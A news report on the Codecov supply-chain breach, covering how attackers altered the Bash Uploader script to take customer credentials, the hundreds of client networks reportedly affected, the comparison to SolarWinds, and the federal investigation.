As the scale of the impact is becoming more obvious, the recent Codecov system breach draws comparisons to the SolarWinds attacks that the U.S. government has attributed to the Russian Foreign Intelligence Service (SVR). Reuters investigators have found that hundreds of customer networks have been breached as a result of Codecov’s systems breach.
As we reported last week, in a supply-chain attack on Codecov, that went undetected for over two months, threat actors managed to steal Codecov devs’ credentials using doctored Docker images. The attackers exfiltrated Codecov customers’ credentials by replacing Codecov’s IP address in the Bash Uploader script.
Codecov is an online software testing platform that integrates with GitHub projects and used in thousands of projects by over 29,000 enterprises that build software. Codecov’s customers include the likes of IBM, Hewlett Packard, GoDaddy, Atlassian, The Washington Post, Procter & Gamble (P & G).
It was not until April 1st that the company found out about the malicious activity. Soon the incident got the attention of U.S. federal investigators since the breach was in a supply chain and the attack has been compared to the SolarWinds attacks.
According to federal investigators, Codecov attackers managed to tap into hundreds of client networks, expanding far beyond Codecov’s systems. Hackers could have gained credentials for thousands of other systems and products, according to the investigator.
“The hackers put extra effort into using Codecov to get inside other makers of software development programs, as well as companies that themselves provide many customers with technology services, including IBM,” a federal investigator anonymously told Reuters.
According to BeepingComputer, some Codecov clients including IBM stated that their code has not been modified, but declined to comment on whether their systems had been breached.
The full impact of this incident is still unclear and U.S. federal government investigators are now investigating the incident.